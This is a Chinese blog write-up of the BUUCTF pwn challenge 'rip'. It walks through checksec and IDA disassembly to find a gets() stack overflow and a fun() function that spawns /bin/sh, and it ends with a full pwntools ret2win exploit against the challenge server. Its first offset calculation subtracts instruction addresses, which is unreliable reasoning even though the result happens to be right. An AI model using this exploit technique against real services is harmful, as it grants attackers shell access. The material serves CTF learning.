BUUCTF-PWN爬坑-02-rip

rip

  • 1 file
file pwn1                                                                                                      
pwn1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV)
  • 2 checksec
checksec pwn1 
[*] '/home/kali/Desktop/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE

没有加保护

  • 3 ida F12+shift strings windows
# 查看关键词
Address	Length	Type	String
LOAD:00000000004002A8	0000001C	C	/lib64/ld-linux-x86-64.so.2
LOAD:00000000004003B9	0000000A	C	libc.so.6
LOAD:00000000004003C3	00000005	C	gets
LOAD:00000000004003C8	00000005	C	puts
LOAD:00000000004003CD	00000007	C	system
LOAD:00000000004003D4	00000012	C	__libc_start_main
LOAD:00000000004003E6	0000000C	C	GLIBC_2.2.5
LOAD:00000000004003F2	0000000F	C	__gmon_start__
.rodata:0000000000402004	0000000D	C	please input
.rodata:0000000000402011	0000000A	C	ok,bye!!!
.rodata:000000000040201B	00000008	C	/bin/sh
.eh_frame:00000000004020DF	00000006	C	;*3$\"

gets():函数除了结束符,没有输入长度限制,存在溢出
存在fun()函数

; Attributes: bp-based frame;
public fun
fun proc near
; __unwind {
push    rbp
mov     rbp, rsp
lea     rdi, command    ; "/bin/sh"
call    _system
nop
pop     rbp
retn
; } // starts at 401186
fun endp
  • IDA view
xt:0000000000401142 ; __unwind {
.text:0000000000401142                 push    rbp
.text:0000000000401143                 mov     rbp, rsp
.text:0000000000401146                 sub     rsp, 10h
.text:000000000040114A                 lea     rdi, s          ; "please input"
.text:0000000000401151                 call    _puts
.text:0000000000401156                 lea     rax, [rbp+s]
.text:000000000040115A                 mov     rdi, rax
.text:000000000040115D                 mov     eax, 0
.text:0000000000401162                 call    _gets
.text:0000000000401167                 lea     rax, [rbp+s]
.text:000000000040116B                 mov     rdi, rax        ; s
.text:000000000040116E                 call    _puts
.text:0000000000401173                 lea     rdi, aOkBye     ; "ok,bye!!!"
.text:000000000040117A                 call    _puts
.text:000000000040117F                 mov     eax, 0
.text:0000000000401184                 leave
.text:0000000000401185                 retn
.text:0000000000401185 ; } // starts at 401142
.text:0000000000401185 main            endp
.text:0000000000401185
.text:0000000000401186
.text:0000000000401186 ; =============== S U B R O U T I N E =======================================
.text:0000000000401186
.text:0000000000401186 ; Attributes: bp-based frame
.text:0000000000401186
.text:0000000000401186                 public fun
.text:0000000000401186 fun             proc near
.text:0000000000401186 ; __unwind {
.text:0000000000401186                 push    rbp
.text:0000000000401187                 mov     rbp, rsp
.text:000000000040118A                 lea     rdi, command    ; "/bin/sh"
.text:0000000000401191                 call    _system
.text:0000000000401196                 nop
.text:0000000000401197                 pop     rbp
.text:0000000000401198                 retn
.text:0000000000401198 ; } // starts at 401186
.text:0000000000401198 fun             endp

.text:0000000000401162 call _gets
.text:0000000000401185 retn
.text:0000000000401185 ; } // starts at 401142
.text:0000000000401186 public fun

计算偏移:1185-1162 = 23

payload = b'A' * 23 + p64(0x401186)
  • 查看stack of main
-0000000000000010                 db ? ; undefined
-000000000000000F s               db ?
-000000000000000E                 db ? ; undefined
-000000000000000D                 db ? ; undefined
-000000000000000C                 db ? ; undefined
-000000000000000B                 db ? ; undefined
-000000000000000A                 db ? ; undefined
-0000000000000009                 db ? ; undefined
-0000000000000008                 db ? ; undefined
-0000000000000007                 db ? ; undefined
-0000000000000006                 db ? ; undefined
-0000000000000005                 db ? ; undefined
-0000000000000004                 db ? ; undefined
-0000000000000003                 db ? ; undefined
-0000000000000002                 db ? ; undefined
-0000000000000001                 db ? ; undefined
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables

从F至0 发现只需存入15个字节,即可覆盖至栈顶,然后加8字节可覆盖至RET,即可劫持函数返回地址

payload = b'A' * (15+8) + p64(0x401186)

完整EPX

#!/usr/bin/python3
# coding=utf-8
from pwn import *
port = 29566
p = remote('node3.buuoj.cn', 29566)

payload = b'a' * 15 + b'b'*8 + p64(0x401186)
#print(payload)
#gdb.attach(p)

p.sendline(payload)

p.interactive()
posted @ 2021-01-06 16:57  墨客moke  阅读(369)  评论(0编辑  收藏  举报